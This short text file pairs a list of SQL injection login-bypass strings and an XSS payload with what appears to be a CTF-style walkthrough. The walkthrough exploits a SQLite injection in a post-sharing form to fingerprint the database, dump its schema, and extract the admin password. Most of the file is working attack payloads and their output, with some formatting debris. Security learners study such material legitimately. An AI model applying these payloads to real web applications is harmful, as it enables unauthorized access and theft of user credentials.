sqlinjection_xss.txt

flag XSS  <img src onerror=alert("")>
 
'or''=' 
' or 1=1 – 
1'or'1'='1 
admin'– 
" or 0=0 – 
or 0=0 – 
' or 0=0 # 
" or 0=0 # 
or 0=0 # 
' or 'x'='x 
" or "x"="x 
') or ('x'='x 
' or 1=1– 
" or 1=1– 
or 1=1– 
' or a=a– 
" or "a"="a 
') or ('a'='a 
") or ("a"="a 
hi" or "a"="a 
hi" or 1=1 – 
hi' or 1=1 – 
hi' or 'a'='a 
hi') or ('a'='a 
hi") or ("a"=")


So we have a sharing form but we need to login in order to share any post. Register with any credentials. Try inserting a single quote in the post and .. BOOM.

 Error : HY000 1 unrecognized token: "''')"

SQL Injection in the insertion query .. but wait is that a SQLite DB?
Let’s check the version ..
1
	
x', (select version()));--

Error : HY000 1 no such function: version

Mmmm, at the point i was pretty sure it is a SQLite, so I tried sqlite_version() it passed! but one more thing we have different number of columns Error : HY000 1 4 values for 3 columns .. let’s concatenate
1
	
x' || (select sqlite_version()));--

x3.15.1

now let’s see what tables/column do we have here ..
1
	
x' || (SELECT sql FROM sqlite_master));--

xCREATE TABLE "xde43_users" ( "id" int(10) NOT NULL, "name" varchar(255) NOT NULL, "email" varchar(255) NOT NULL, "password" varchar(255) NOT NULL, "role" varchar(100) DEFAULT NULL )

We are very close to getting this .. one more injection 🙂
1
	
x' || (select password from xde43_users where role="admin"));--